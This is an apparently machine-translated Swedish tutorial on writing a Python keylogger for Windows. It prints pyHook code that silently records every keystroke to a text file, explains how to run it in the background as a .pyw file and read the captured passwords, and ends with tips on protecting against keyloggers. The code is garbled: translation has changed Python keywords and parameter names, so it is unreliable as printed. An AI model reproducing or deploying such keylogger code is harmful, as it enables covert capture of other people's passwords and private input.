Hur man skapar en keylogger och registrerar lösenord i Windows

keyloggers är en typ av verktyg som hackare använder för att stjäla lösenord. Det är ytterligare ett av de många hot som finns i nätverket. Men dess skapelse är inte alls komplicerad. Du behöver bara ha den nödvändiga kunskapen och en serie applikationer. På så sätt kommer du att kunna sätta dina nycklar på prov och vara beredd på en riktig attack där de kan bryta dina nycklar. Vi kommer att förklara hur du kan göra det.

Hur en keylogger fungerar

skapa en keylogger och registrera lösenord i Windows

Den här typen av skadlig programvaras uppdrag är att registrera alla nycklar som vi trycker på på tangentbordet. På detta sätt, varje gång vi loggar in på e-post, Facebook eller någon annan tjänst, kommer programmet att spela in vad vi lägger och därmed stjäla åtkomstkoden och användarnamnet.

Vi kan säga att en keylogger är ett av de äldsta skadliga verktygen. Även om antivirus numera kan upptäcka de flesta av dem, är sanningen att hackare fortsätter att perfekta sina tekniker och lyckas nå fler offer på både datorer och mobila enheter.

Det är vanligtvis gömd i en fil som vi laddar ner över internet, en applikation som vi har installerat och liknande. Det körs i bakgrunden på vårt system, utan att vi riktigt vet att det fungerar, och samtidigt som alla tangenttryckningar spelas in. Detta kan senare skickas till en server som kontrolleras av angriparna.

Denna keylogger kan till och med vara utformad enbart för att registrera lösenord på systemnivå och lagras på själva datorn. Om det är ett delat team kan någon annan se vad nycklarna är.

Steg för att skapa en

Vi ska förklara hur vi kan skapa en keylogger lokalt , för att testa våra lösenord. Att skapa en på distans är mer komplett. Det vi ska göra är att spela in tangenttryckningarna på vår dator. Tänk på att vi endast måste göra detta för personligt bruk, för att testa våra egna lösenord och inte påverka tredje part som kan använda den utrustningen.

Öppna anteckningsblock

Det första vi måste göra är att öppna Windows Anteckningar eller någon annan applikation där vi kan skriva i klartext. Även Python-redigeraren själv skulle göra det. I det dokumentet som vi har skapat måste vi skriva följande kod:

</pre>
import pyHook, pythoncom, sys, logging
# feel free to set the file_log to a different file name/location

file_log = 'keyloggeroutput.txt'

def OnKeyboardEvent (händelse):
logging.basicConfig (filnamn = file_log, level = logging.DEBUG, format = '% (meddelande) s')
chr (event.Ascii)
logging.log (10, chr (event.Ascii))
återvänd True
hooks_manager = pyHook.HookManager ()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

När detta är gjort är nästa sak att göra att spara filen i pyw-format . Till exempel kan vi namnge det Keylogger.pyw. Helt enkelt med dessa steg kommer vi att ha vår keylogger skriven i Python redo. Från det ögonblicket kommer vi att kunna spela in alla tangenttryckningar på tangentbordet på vår utrustning. Allt detta som du ska spela in kommer att sparas i ett separat dokument.

kod keylogger sencillo

Ladda ner och installera Python

Python måste installeras för att det ska fungera. Om du inte har det installerat på Windows kan du gå till den officiella webbplatsen och ladda ner den senaste versionen. Den är för närvarande 3.10.1. PyHook och Pywin32 måste också installeras för att det ska fungera smidigt.

När vi har den installerad och klar att använda, skulle vi bara behöva köra filen som vi skapade tidigare. Vi måste gå till vägen där vi sparar Keylogger.pyw (eller vilket namn vi nu vill ge det) och dubbelklicka. Från det ögonblicket kommer den att börja spela in alla tangenttryckningar vi gör.

Process i Task Manager

Om du vill kontrollera om det fungerar korrekt eller inte, behöver du bara gå till Aktivitetshanteraren . För att göra detta måste du trycka på tangentkombinationen Ctrl + Alt + Del och öppna den där. Alla processer som körs kommer att visas och den som intresserar oss i det här fallet är pythow.exe.

Avsluta keylogger process python

När du vill avsluta det är allt du behöver göra att gå till Aktivitetshanteraren, klicka på processen och klicka på Slutför. Det kommer automatiskt att sluta registrera de tangenter som trycks på tangentbordet och kommer att generera ett textdokument i .txt-format. Det är här som allt som har tryckts visas.

Visa filen med lösenorden

Att se textfil med alla nycklar som den har registrerat (liksom alla tangenttryckningar) måste vi gå till katalogen där filen var i .pyw-format, antingen Keylogger.pyw eller vilket namn vi än anger den, och en textfil som heter keyloggeroutput. txt kommer att visas där.

Pulsaciones registradas keylogger

När vi öppnat kommer vi att se något liknande det som visas i bilden ovan. Vi kommer att kunna se nycklarna som den har registrerat. Det är enkelt, idealiskt att kunna testa lösenorden som vi lägger i Windows och se i vilken utsträckning våra nycklar kan bli stulna i händelse av en mer sofistikerad attack som de kan fjärrstyra.

Tips som ska skyddas

Efter att ha sett hur vi kan skapa en enkel keylogger att använda på en personlig nivå, på vår dator, kommer vi att ge några tips för att undvika att bli offer för denna typ av attack. Det är viktigt att skyddas så att vår åtkomstkoder kan inte stjälas.

Säkerhetsprogram

Det första är att ha säkerhetsprogram. A bra antivirus är viktigt för att förhindra att virus kommer in. Till exempel kan vi namnge själva Windows Defender, Avast, Bitdefender eller något annat. Det finns många alternativ, men vi måste alltid välja en av garantierna.

Utöver ett antivirus kan vi också ha andra applikationer som t.ex brandvägg eller till och med tillägg för webbläsaren. I alla fall kommer de att bidra till att förbättra säkerheten och undvika farliga anslutningar som kan användas för att smyga in keyloggers och andra hot.

Ha allt uppdaterat

Ibland sårbarheter dyker upp i system . Det finns säkerhetsbrister som påverkar vissa applikationer, till exempel webbläsaren. Detta kan leda till att skadlig programvara kommer in och äventyra vår integritet. För att undvika detta är det viktigt att ha de senaste versionerna.

Säkerhet patchar används för att åtgärda dessa problem. Vi måste ha uppdaterat Windows, webbläsaren och alla program som vi använder. Även drivrutinerna för nätverkskortet bör också vara uppdaterade, vilket minskar risken för problem.

Använd officiella appar

Självklart ska vi alltid använda officiella program . Det är sant att vi ibland finner oss själva med möjligheten att ha några applikationer som har extrafunktioner, men eftersom de inte är officiella vet vi inte om de är garantier och på vilket sätt de kan påverka oss.

En hacker kan ha skapat ett program som utger sig för att vara legitimt men som faktiskt används för att stjäla information eller smyga en keylogger. För att undvika detta måste vi alltid ladda ner mjukvara från officiella butiker och säkra sidor.

Sunt förnuft

Ett tips till är att behålla sunt förnuft. Det är viktigt att undvik att göra misstag , som att ladda ner filer som når oss via e-mail utan att verifiera identiteten eller öppna länkar via tredje parts webbplatser, som kan ha skapats bara för att stjäla data.

De flesta attacker sker med användarinteraktion. Även keyloggers, som i många fall måste ladda ner en fil eller installera ett program som vi tidigare har laddat ner från en osäker sida.

Kort sagt, att skapa en keylogger för personligt bruk är väldigt enkelt, som vi har sett. En angripare kan dock skapa en mer sofistikerad och kunna stjäla lösenord på distans. Det är viktigt att vara skyddad och inte göra misstag som kan påverka oss i vår vardag.